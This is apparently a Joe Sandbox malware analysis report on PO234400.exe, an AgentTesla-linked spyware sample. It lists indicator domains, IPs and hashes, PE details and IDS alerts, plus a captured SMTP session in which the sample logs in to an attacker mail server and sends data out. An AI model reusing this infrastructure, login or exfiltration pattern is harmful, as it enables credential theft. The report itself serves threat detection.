                        Source | Detection | Scanner | Label
                        http://mbarieservicesltd.com | 0% | Avira URL Cloud | safe
                        http://mail.mbarieservicesltd.com | 100% | Avira URL Cloud | malware
                        http://tempuri.org/DataSet1.xsd | 0% | Avira URL Cloud | safe
                        Name | IP | Active | Malicious | Antivirus Detection | Reputation
                        mbarieservicesltd.com | 199.79.62.115 | true | true | | unknown
                        mail.mbarieservicesltd.com | unknown | unknown | true | | unknown

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://mbarieservicesltd.com | PO234400.exe, 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PO234400.exe, 00000000.00000002.1378595010.0000000002F57000.00000004.00000800.00020000.00000000.sdmp | false | | high
                        http://tempuri.org/DataSet1.xsd | PO234400.exe | false | Avira URL Cloud: safe | unknown
                        http://mail.mbarieservicesltd.com | PO234400.exe, 00000006.00000002.2607967300.000000000322A000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IP | Domain | Country | ASN | ASN Name | Malicious
                              199.79.62.115 | mbarieservicesltd.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
                              Joe Sandbox version:40.0.0 Tourmaline
                              Analysis ID:1410984
                              Start date and time:2024-03-18 14:29:33 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 40s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:14
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:PO234400.exe
                              Detection:MAL
                              Classification:mal100.troj.spyw.evad.winEXE@9/6@1/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 46
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes were analyzed, report is missing behavior information
                              • Report size getting too big, too many NtCreateKey calls found.
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: PO234400.exe
                              Time | Type | Description
                              14:30:23 | API Interceptor | 22x Sleep call for process: PO234400.exe modified
                              14:30:25 | API Interceptor | 12x Sleep call for process: powershell.exe modified
                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              199.79.62.115 | 260224-027.exe | malicious | AgentTesla |
                              199.79.62.115 | xWDXthOyvb.exe | malicious | AgentTesla |
                              199.79.62.115 | mo49c5w1Dg.exe | malicious | AgentTesla |
                              199.79.62.115 | SA3190 - SO3216.exe | malicious | AgentTesla, PureLog Stealer |
                              199.79.62.115 | PO-8700.exe | malicious | AgentTesla, PureLog Stealer |
                              199.79.62.115 | 60025450.exe | malicious | AgentTesla |
                              199.79.62.115 | quote_200006595.exe | malicious | AgentTesla |
                              199.79.62.115 | Quotation_Details.exe | malicious | AgentTesla |
                              199.79.62.115 | SWIFT004.exe | malicious | AgentTesla |
                              199.79.62.115 | SecuriteInfo.com.Win32.TrojanX-gen.8086.15681.exe | malicious | AgentTesla |

                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              mbarieservicesltd.com | Quote_3309.exe | malicious | AgentTesla | 35.186.223.180

                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                              PUBLIC-DOMAIN-REGISTRYUS | WZEF7aEu11.exe | malicious | Unknown | 74.119.239.234
                              PUBLIC-DOMAIN-REGISTRYUS | WZEF7aEu11.exe | malicious | Unknown | 74.119.239.234
                              PUBLIC-DOMAIN-REGISTRYUS | WZEF7aEu11.exe | malicious | Unknown | 74.119.239.234
                              PUBLIC-DOMAIN-REGISTRYUS | 260224-027.exe | malicious | AgentTesla | 199.79.62.115
                              PUBLIC-DOMAIN-REGISTRYUS | WZEF7aEu11.exe | malicious | Unknown | 74.119.239.234
                              PUBLIC-DOMAIN-REGISTRYUS | https://sprl.in/wBwUGK0 | malicious | Unknown | 216.10.243.64
                              PUBLIC-DOMAIN-REGISTRYUS | Proforma Invoice001&002-pdf.exe | malicious | AgentTesla | 208.91.199.223
                              PUBLIC-DOMAIN-REGISTRYUS | PO m#U1edbi_#28809466.exe | malicious | AgentTesla | 208.91.199.223
                              PUBLIC-DOMAIN-REGISTRYUS | PO.exe | malicious | AgentTesla | 208.91.198.143
                              PUBLIC-DOMAIN-REGISTRYUS | DHL Receipt_ AWB#62600719881.exe | malicious | AgentTesla | 208.91.199.224
                                                  No context
                                                  No context
                                                  Process:C:\Users\user\Desktop\PO234400.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2232
                                                  Entropy (8bit):5.380046556058007
                                                  Encrypted:false
                                                  SSDEEP:48:tWSU4xympgv4RIoUP7gZ9tK8NPZHUx7u1iMuge//ZSUyus:tLHxv2IfLZ2KRH6OugEs
                                                  MD5:6CC7DDDD06B381EA5284A27AE5E5B633
                                                  SHA1:D41CE03873A1DCE6220D830CD8212B93B4265DBF
                                                  SHA-256:A5A75507E7FEC921191D067D0092446489C317DDC070A8C4B78EB26563DA8927
                                                  SHA-512:91A4496B77D67240A41548997C2858DCB14ED29579586738157568220A902F1E7FB47FC09FE1DC27B1B0315DDBE6E039D6C67217AE472E05621E97ADC46F1A18
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.848927129971296
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:PO234400.exe
                                                  File size:634'368 bytes
                                                  MD5:1ed78424905206c4549ac51b97b5120b
                                                  SHA1:bd106b43a6cad1fc21d8b71cb70c86295a9439b7
                                                  SHA256:5ca87353c4d37e66f76875a46235208796dd620ad3cb7cebc6b5e66be55b2913
                                                  SHA512:dbe0ed36c6813e0037d578e6a79562949386e135c755b9da95e23686e71a4c5f22f5fa096d851b67393d0a9351c72c4124b0be2d5d610704f483021acd772380
                                                  SSDEEP:12288:S2ShC3RLZiWsXk3qNIvomdlP27H/MNThSlOeFsd/hE:VSUJZdbdCH/shSlOVZE
                                                  TLSH:D3D4010327E8AA1EF47FA7F424611114137A7A17BA73D74D4FE8E1CB1A21B054E62B1B
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.............f.... ........@.. ....................... ............@................................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x49c066
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0xF37F2E8A [Mon Jun 15 09:21:14 2099 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9c013 | 0x4f | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x9e000 | 0x620 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa0000 | 0xc | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x99520 | 0x70 | .text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x2000 | 0x9a06c | 0x9a200 | ef51eb50e1294e89336ddd8b5fdbfb66 | False | 0.8867330063868614 | data | 7.8603183590444825 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc | 0x9e000 | 0x620 | 0x800 | b2700473df96ed14ece9bab955f11d37 | False | 0.33984375 | data | 3.471390538284318 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0xa0000 | 0xc | 0x200 | 89a5598d525f1c5ff2371fc8771ef23d | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  RT_VERSION | 0x9e090 | 0x390 | data | | | 0.4276315789473684
                                                  RT_MANIFEST | 0x9e430 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                                                  DLL | Import
                                                  mscoree.dll | _CorExeMain
                                                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                  03/18/24-14:30:28.601602 | TCP | 2840032 | ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  03/18/24-14:30:28.601602 | TCP | 2855542 | ETPRO TROJAN Agent Tesla CnC Exfil Activity | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  03/18/24-14:30:28.601602 | TCP | 2855245 | ETPRO TROJAN Agent Tesla Exfil via SMTP | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  03/18/24-14:30:28.601602 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  03/18/24-14:30:28.601602 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  03/18/24-14:30:28.601602 | TCP | 2839723 | ETPRO TROJAN Win32/Agent Tesla SMTP Activity | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Mar 18, 2024 14:30:26.939718962 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:27.112437963 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:27.112546921 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:27.378134012 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:27.378813982 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:27.551665068 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:27.552731037 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:27.725832939 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:27.726944923 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:27.940346003 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.067830086 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.068140984 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:28.241786003 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.241801977 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.242046118 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:28.427967072 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.428138971 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:28.600712061 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.600796938 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.601602077 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:28.601602077 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:28.601692915 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:28.601777077 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:30:28.774682045 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.775456905 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:30:28.822397947 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:32:06.916631937 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:32:07.129497051 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:32:07.290652037 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Mar 18, 2024 14:32:07.290838957 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:32:07.291032076 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115
                                                  Mar 18, 2024 14:32:07.463706970 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                  Mar 18, 2024 14:30:26.565315962 CET | 59189 | 53 | 192.168.2.8 | 1.1.1.1
                                                  Mar 18, 2024 14:30:26.924618959 CET | 53 | 59189 | 1.1.1.1 | 192.168.2.8
                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                  Mar 18, 2024 14:30:26.565315962 CET | 192.168.2.8 | 1.1.1.1 | 0xb14e | Standard query (0) | mail.mbarieservicesltd.com | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                  Mar 18, 2024 14:30:26.924618959 CET | 1.1.1.1 | 192.168.2.8 | 0xb14e | No error (0) | mail.mbarieservicesltd.com | mbarieservicesltd.com | | CNAME (Canonical name) | IN (0x0001) | false
                                                  Mar 18, 2024 14:30:26.924618959 CET | 1.1.1.1 | 192.168.2.8 | 0xb14e | No error (0) | mbarieservicesltd.com | | 199.79.62.115 | A (IP address) | IN (0x0001) | false
                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                  Mar 18, 2024 14:30:27.378134012 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Mon, 18 Mar 2024 19:00:27 +0530
                                                                                                                                   220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                   220 and/or bulk e-mail.
                                                  Mar 18, 2024 14:30:27.378813982 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115 | EHLO 760639
                                                  Mar 18, 2024 14:30:27.551665068 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 250-md-54.webhostbox.net Hello 760639 [191.96.227.194]
                                                                                                                                   250-SIZE 52428800
                                                                                                                                   250-8BITMIME
                                                                                                                                   250-PIPELINING
                                                                                                                                   250-PIPECONNECT
                                                                                                                                   250-AUTH PLAIN LOGIN
                                                                                                                                   250-STARTTLS
                                                                                                                                   250 HELP
                                                  Mar 18, 2024 14:30:27.552731037 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115 | AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
                                                  Mar 18, 2024 14:30:27.725832939 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 334 UGFzc3dvcmQ6
                                                  Mar 18, 2024 14:30:28.067830086 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 235 Authentication succeeded
                                                  Mar 18, 2024 14:30:28.068140984 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115 | MAIL FROM:<saless@mbarieservicesltd.com>
                                                  Mar 18, 2024 14:30:28.241801977 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 250 OK
                                                  Mar 18, 2024 14:30:28.242046118 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115 | RCPT TO:<iinfo@mbarieservicesltd.com>
                                                  Mar 18, 2024 14:30:28.427967072 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 250 Accepted
                                                  Mar 18, 2024 14:30:28.428138971 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115 | DATA
                                                  Mar 18, 2024 14:30:28.600796938 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 354 Enter message, ending with "." on a line by itself
                                                  Mar 18, 2024 14:30:28.601777077 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115 | .
                                                  Mar 18, 2024 14:30:28.775456905 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 250 OK id=1rmD4O-000rDB-1f
                                                  Mar 18, 2024 14:32:06.916631937 CET | 49708 | 587 | 192.168.2.8 | 199.79.62.115 | QUIT
                                                  Mar 18, 2024 14:32:07.290652037 CET | 587 | 49708 | 199.79.62.115 | 192.168.2.8 | 221 md-54.webhostbox.net closing connection
                                                  Target ID:0
                                                  Start time:14:30:23
                                                  Start date:18/03/2024
                                                  Path:C:\Users\user\Desktop\PO234400.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\PO234400.exe
                                                  Imagebase:0xa60000
                                                  File size:634'368 bytes
                                                  MD5 hash:1ED78424905206C4549AC51B97B5120B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
